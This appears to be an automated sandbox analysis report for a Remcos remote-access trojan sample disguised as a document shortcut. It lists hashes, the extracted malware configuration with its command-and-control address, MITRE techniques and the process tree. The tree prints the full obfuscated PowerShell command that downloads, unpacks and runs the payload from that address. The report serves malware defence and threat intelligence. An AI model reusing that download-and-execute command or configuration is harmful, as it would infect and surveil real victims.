remcos | 0973bf4ab963c2de6c69c3809ed228f0caf00409f4c09e78029640f2026dc19e

Resubmissions

29-08-2024 11:25

240829-nh9xrs1bll 10

29-08-2024 10:50

29-08-2024 10:06

29-08-2024 09:04

29-08-2024 08:36

Analysis

max time kernel
120s
max time network
109s
platform
windows10-1703_x64
resource
win10-20240404-uk
resource tags

arch:x64arch:x86image:win10-20240404-uklocale:uk-uaos:windows10-1703-x64systemwindows
submitted
29-08-2024 11:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

brt_1_0147.doc.lnk
Size

47KB
MD5

8b3dc64090b0b26eda4f1195f493160d
SHA1

bd0b4c1d9e8b84465714287727ba5293f9a8eb61
SHA256

cb43e05491b09d4c7da14d3f42d11a2bb4fa81b0fb47717d44c75426832cdf30
SHA512

ddbe1ad300d613531b6ffcb9a8ff607b1e6e7cf676ce738c31d138e6154ff0ee3c1b8d4d8b67c8fec5da444c845b62475736c228eb89d3b013a3ddcb15365deb
SSDEEP

48:88muavUQSbXTo87Cj3YMEDo/FoZaxCogDDo/LX7LdCZZGXu/dZZIa7x:88y8Nkgm3hX+UxCgLX7BuqQ

Score

10^/10

remcos feetfuck discovery rat

Malware Config

Extracted

Family

remcos

Botnet

feetfuck

83.222.191.201:24251

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-XTJ1YO
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1 4100 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Newfts.exeNewfts.exe

pid process

1192 Newfts.exe
4868 Newfts.exe
Loads dropped DLL 8 IoCs

Processes:

Newfts.exeNewfts.exe

pid process

1192 Newfts.exe
1192 Newfts.exe
1192 Newfts.exe
1192 Newfts.exe
4868 Newfts.exe
4868 Newfts.exe
4868 Newfts.exe
4868 Newfts.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Newfts.exe

description pid process target process

PID 4868 set thread context of 2312 4868 Newfts.exe cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
1	4100	powershell.exe

pid	process
1192	Newfts.exe
4868	Newfts.exe

pid	process
1192	Newfts.exe
1192	Newfts.exe
1192	Newfts.exe
1192	Newfts.exe
4868	Newfts.exe
4868	Newfts.exe
4868	Newfts.exe
4868	Newfts.exe

description	pid	process	target process
PID 4868 set thread context of 2312	4868	Newfts.exe	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exeexplorer.exeNewfts.exeNewfts.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Newfts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Newfts.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings powershell.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4196 WINWORD.EXE
4196 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exeNewfts.exeNewfts.execmd.exe

pid process

4100 powershell.exe
4100 powershell.exe
4100 powershell.exe
1192 Newfts.exe
4868 Newfts.exe
4868 Newfts.exe
2312 cmd.exe
2312 cmd.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Newfts.execmd.exe

pid process

4868 Newfts.exe
2312 cmd.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4100 powershell.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

WINWORD.EXE

pid process

4196 WINWORD.EXE
4196 WINWORD.EXE
4196 WINWORD.EXE
4196 WINWORD.EXE
4196 WINWORD.EXE
4196 WINWORD.EXE
4196 WINWORD.EXE
4196 WINWORD.EXE
4196 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	powershell.exe

pid	process
4196	WINWORD.EXE
4196	WINWORD.EXE

pid	process
4100	powershell.exe
4100	powershell.exe
4100	powershell.exe
1192	Newfts.exe
4868	Newfts.exe
4868	Newfts.exe
2312	cmd.exe
2312	cmd.exe

pid	process
4868	Newfts.exe
2312	cmd.exe

description	pid	process
Token: SeDebugPrivilege	4100	powershell.exe

pid	process
4196	WINWORD.EXE
4196	WINWORD.EXE
4196	WINWORD.EXE
4196	WINWORD.EXE
4196	WINWORD.EXE
4196	WINWORD.EXE
4196	WINWORD.EXE
4196	WINWORD.EXE
4196	WINWORD.EXE

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

cmd.exepowershell.exeNewfts.exeNewfts.execmd.exe

description	pid	process	target process
PID 2292 wrote to memory of 4100	2292	cmd.exe	powershell.exe
PID 2292 wrote to memory of 4100	2292	cmd.exe	powershell.exe
PID 4100 wrote to memory of 1192	4100	powershell.exe	Newfts.exe
PID 4100 wrote to memory of 1192	4100	powershell.exe	Newfts.exe
PID 4100 wrote to memory of 1192	4100	powershell.exe	Newfts.exe
PID 1192 wrote to memory of 4868	1192	Newfts.exe	Newfts.exe
PID 1192 wrote to memory of 4868	1192	Newfts.exe	Newfts.exe
PID 1192 wrote to memory of 4868	1192	Newfts.exe	Newfts.exe
PID 4100 wrote to memory of 4196	4100	powershell.exe	WINWORD.EXE
PID 4100 wrote to memory of 4196	4100	powershell.exe	WINWORD.EXE
PID 4868 wrote to memory of 2312	4868	Newfts.exe	cmd.exe
PID 4868 wrote to memory of 2312	4868	Newfts.exe	cmd.exe
PID 4868 wrote to memory of 2312	4868	Newfts.exe	cmd.exe
PID 4868 wrote to memory of 2312	4868	Newfts.exe	cmd.exe
PID 2312 wrote to memory of 1748	2312	cmd.exe	explorer.exe
PID 2312 wrote to memory of 1748	2312	cmd.exe	explorer.exe
PID 2312 wrote to memory of 1748	2312	cmd.exe	explorer.exe
PID 2312 wrote to memory of 1748	2312	cmd.exe	explorer.exe
PID 2312 wrote to memory of 1748	2312	cmd.exe	explorer.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\brt_1_0147.doc.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo QMwlXCkteAQTQqnkaJqrUqs; echo QvYiYqvrrHquSStJfMRfSfWhN; echo bbOXmbTScxuUqnRAgrxICMaBVDaWjzRzRVcfkbymVEadrSAtp; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo smmOpvMyMQBsjhmNQati; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo XmLObXLAbAaEvFXwLygA; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/brt_1_0147.doc -OutFile brt_1_0147.doc; echo jKSqGTomhhZFxOMFkLZBsdHuhOCDBrMzMONLWouYJOCxTyelGMtYZGs; s''t''a''rt brt_1_0147.doc
2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4100

C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe
"C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1192

C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2312

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
6⤵
- System Location Discovery: System Language Discovery
PID:1748

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\brt_1_0147.doc" /o ""
3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4196

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:364

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
1⤵
PID:2548

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini
1⤵
PID:2700

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4f7b39b1
Filesize
1.2MB

MD5
1e3c4f28123f69a2f9cee3713a1cb1e5

SHA1
b2ca8d5efec1789346eadfb1fe2efc1f32cac7a0

SHA256
74f86370efd98f355fb91c4850a00d20100a213a92ab692627f702ba13ca9e7c

SHA512
f67ffda43de4d15e9cb60d275aca915d5b18c4748ce7aaa603d0ea3b5b0507c4ee29b56db7ef5fa94b4b4ec0bda00b68b0e84c30504a18ec6fb7fcd0dd629af0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD7FF.tmp\gb.xsl
Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hmgcyf2z.edq.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Filesize
257B

MD5
b55d697eef42a31cf5f20c4c0f1a0542

SHA1
bf1e6b60a05ba7653eed79a741fb483089bfcb4b

SHA256
8f539fff8dab1089705abc0f5dc264ccd35e3f02b9e75080f7c7ff2ddd03cd4e

SHA512
89f14a5530468fb44aaf82cab8582177c7ed22f881b57fe1ce3227cc3635535439f5b08b365e323ba83fab8556f9ce6367a924e457647e056cc703b28ecb22bc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize
3KB

MD5
97ec969471a4a5c24f96d26816dc7784

SHA1
156786a5b43cbcf2b1c377c1a5abad332b160631

SHA256
4af2f4e94784affd504fde6d35e969c5904a54205046db9c057b37a9a02ee60e

SHA512
103d732032e7c9de195d4000274323a3076a7ce33e598e7f061f46eb94d7049e7b46ec5e15547520d560787c59bec1da4bc402ff784b2b9df9b1bcbe50998637

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize
3KB

MD5
33315c0cf388907a3423b7dd1a490ea0

SHA1
9b56166033f56ff97e5868bf41321a10e814febf

SHA256
a614ee362c76d24aa52ac773bc18f746dc92847a71a5681557ec150a0c8d90c3

SHA512
82191685c9188a9899fdc6145494bd841c53b90d2e30253b9104b809453458f1c6b5697e4280dce7f48b0eb3deb2130fc0629d879080aca0aeab851f4867a0fb

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe
Filesize
2.1MB

MD5
db7e67835fce6cf9889f0f68ca9c29a9

SHA1
5565afda37006a66f0e4546105be60bbe7970616

SHA256
dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738

SHA512
bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\ProductStatistics3.dll
Filesize
1.1MB

MD5
59c15c71fd599ff745a862d0b8932919

SHA1
8384f88b4cac4694cf510ca0d3f867fd83cc9e18

SHA256
c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2

SHA512
be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\RegisterIdr.dll
Filesize
1.4MB

MD5
6fdb2e9ca6b7a5ad510e2b29831e3bc8

SHA1
4a14ee9d5660eb271a6b5f18a55ac3e05f952c68

SHA256
f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38

SHA512
d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\kytarvx
Filesize
31KB

MD5
5dc69a3e2fda6cb740f363ef77edcc13

SHA1
c177fabf17346531e07d562be11915bf2822148a

SHA256
7c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621

SHA512
b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\nywrof
Filesize
1.0MB

MD5
471076308d78944d45ab35d37134134a

SHA1
05cf2cf6e5d11ce10425b14d68cda3246cc47263

SHA256
38d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b

SHA512
7f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3

Download Submit
C:\Users\Admin\AppData\Roaming\brt_1_0147.doc
Filesize
47KB

MD5
2616f33bfc84fecd6496c0e3bfbfb1b0

SHA1
e4f4fba392ba4a245415729a82aaa486ca31b2ba

SHA256
24fbc1c09ca302ed51429082130f7789d36c254c0fb165dd96c3f24b458536a4

SHA512
b5c585d7bbdce5e5c34447a311ccdb5b90e34cfd29671f2ebb05f01941e81ae7bcffbd42f5ed476e784684de70cb0fb67cedfd7e62c4c3b5cbe151fc6923dafb

Download Submit
memory/1192-104-0x00007FFE33AB0000-0x00007FFE33C8B000-memory.dmp

Filesize
1.9MB

Download
memory/1192-103-0x0000000073220000-0x000000007339B000-memory.dmp

Filesize
1.5MB

Download
memory/1192-120-0x0000000000400000-0x0000000000669000-memory.dmp

Filesize
2.4MB

Download
memory/1192-96-0x0000000002A00000-0x0000000002B1E000-memory.dmp

Filesize
1.1MB

Download
memory/1192-124-0x0000000002E00000-0x0000000002F72000-memory.dmp

Filesize
1.4MB

Download
memory/1192-100-0x0000000002E00000-0x0000000002F72000-memory.dmp

Filesize
1.4MB

Download
memory/1192-123-0x0000000002A00000-0x0000000002B1E000-memory.dmp

Filesize
1.1MB

Download
memory/1748-855-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1748-852-0x00007FFE33AB0000-0x00007FFE33C8B000-memory.dmp

Filesize
1.9MB

Download
memory/1748-853-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1748-856-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1748-863-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1748-859-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1748-862-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/2312-359-0x00007FFE33AB0000-0x00007FFE33C8B000-memory.dmp

Filesize
1.9MB

Download
memory/2312-841-0x0000000073220000-0x000000007339B000-memory.dmp

Filesize
1.5MB

Download
memory/4100-56-0x0000024F37320000-0x0000024F37332000-memory.dmp

Filesize
72KB

Download
memory/4100-37-0x00007FFE26833000-0x00007FFE26834000-memory.dmp

Filesize
4KB

Download
memory/4100-148-0x00007FFE26830000-0x00007FFE2721C000-memory.dmp

Filesize
9.9MB

Download
memory/4100-7-0x0000024F37190000-0x0000024F371B2000-memory.dmp

Filesize
136KB

Download
memory/4100-8-0x00007FFE26830000-0x00007FFE2721C000-memory.dmp

Filesize
9.9MB

Download
memory/4100-9-0x00007FFE26830000-0x00007FFE2721C000-memory.dmp

Filesize
9.9MB

Download
memory/4100-12-0x0000024F37340000-0x0000024F373B6000-memory.dmp

Filesize
472KB

Download
memory/4100-33-0x00007FFE26830000-0x00007FFE2721C000-memory.dmp

Filesize
9.9MB

Download
memory/4100-2-0x00007FFE26833000-0x00007FFE26834000-memory.dmp

Filesize
4KB

Download
memory/4100-69-0x0000024F37300000-0x0000024F3730A000-memory.dmp

Filesize
40KB

Download
memory/4100-40-0x00007FFE26830000-0x00007FFE2721C000-memory.dmp

Filesize
9.9MB

Download
memory/4100-39-0x00007FFE26830000-0x00007FFE2721C000-memory.dmp

Filesize
9.9MB

Download
memory/4100-38-0x00007FFE26830000-0x00007FFE2721C000-memory.dmp

Filesize
9.9MB

Download
memory/4196-156-0x00007FFDF0410000-0x00007FFDF0420000-memory.dmp

Filesize
64KB

Download
memory/4196-155-0x00007FFDF0410000-0x00007FFDF0420000-memory.dmp

Filesize
64KB

Download
memory/4196-149-0x00007FFDF3B40000-0x00007FFDF3B50000-memory.dmp

Filesize
64KB

Download
memory/4196-152-0x00007FFDF3B40000-0x00007FFDF3B50000-memory.dmp

Filesize
64KB

Download
memory/4196-150-0x00007FFDF3B40000-0x00007FFDF3B50000-memory.dmp

Filesize
64KB

Download
memory/4196-151-0x00007FFDF3B40000-0x00007FFDF3B50000-memory.dmp

Filesize
64KB

Download
memory/4868-140-0x0000000073220000-0x000000007339B000-memory.dmp

Filesize
1.5MB

Download
memory/4868-336-0x0000000073220000-0x000000007339B000-memory.dmp

Filesize
1.5MB

Download
memory/4868-335-0x0000000002E70000-0x0000000002FE2000-memory.dmp

Filesize
1.4MB

Download
memory/4868-334-0x0000000002B10000-0x0000000002C2E000-memory.dmp

Filesize
1.1MB

Download
memory/4868-333-0x0000000000400000-0x0000000000669000-memory.dmp

Filesize
2.4MB

Download
memory/4868-132-0x0000000002E70000-0x0000000002FE2000-memory.dmp

Filesize
1.4MB

Download
memory/4868-144-0x00007FFE33AB0000-0x00007FFE33C8B000-memory.dmp

Filesize
1.9MB

Download
memory/4868-128-0x0000000002B10000-0x0000000002C2E000-memory.dmp

Filesize
1.1MB

Download